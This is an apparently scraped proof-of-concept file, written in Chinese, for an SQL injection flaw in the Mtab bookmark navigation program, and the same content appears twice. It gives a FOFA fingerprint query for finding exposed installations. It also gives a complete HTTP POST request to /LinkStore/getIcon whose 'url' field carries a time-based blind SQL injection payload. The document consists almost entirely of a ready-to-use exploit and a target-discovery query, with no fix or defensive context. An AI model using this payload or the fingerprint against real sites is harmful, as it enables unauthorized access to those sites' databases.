POC/wpoc/Mtab书签导航程序/Mtab书签导航程序存在SQL注入漏洞.md

# Mtab书签导航程序存在SQL注入漏洞

https://github.com/tsxcw/mtab

## fofa

```yaml
icon_hash="391069193"
```

## poc

```json
POST /LinkStore/getIcon HTTP/1.1
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Accept: application/json, text/plain, */*
Content-Length: 50
Accept-Encoding: gzip,deflate,br
Accept-Ldwk: bG91ZG9uZ3dlbmt1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Host: demo.mtab.cc
Connection: Keep-alive

{"url":"'XOR(if(now()=sysdate(),sleep(4),0))XOR'"}
```
first commit 2025-03-04 23:12:57 +08:00			`# Mtab书签导航程序存在SQL注入漏洞`

			`https://github.com/tsxcw/mtab`

			`## fofa`

			```yaml
			`icon_hash="391069193"`
			```

			`## poc`

			```json
			`POST /LinkStore/getIcon HTTP/1.1`
			`X-Requested-With: XMLHttpRequest`
			`Content-Type: application/json`
			`Accept: application/json, text/plain, /`
			`Content-Length: 50`
			`Accept-Encoding: gzip,deflate,br`
			`Accept-Ldwk: bG91ZG9uZ3dlbmt1`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36`
			`Host: demo.mtab.cc`
			`Connection: Keep-alive`

			`{"url":"'XOR(if(now()=sysdate(),sleep(4),0))XOR'"}`
			```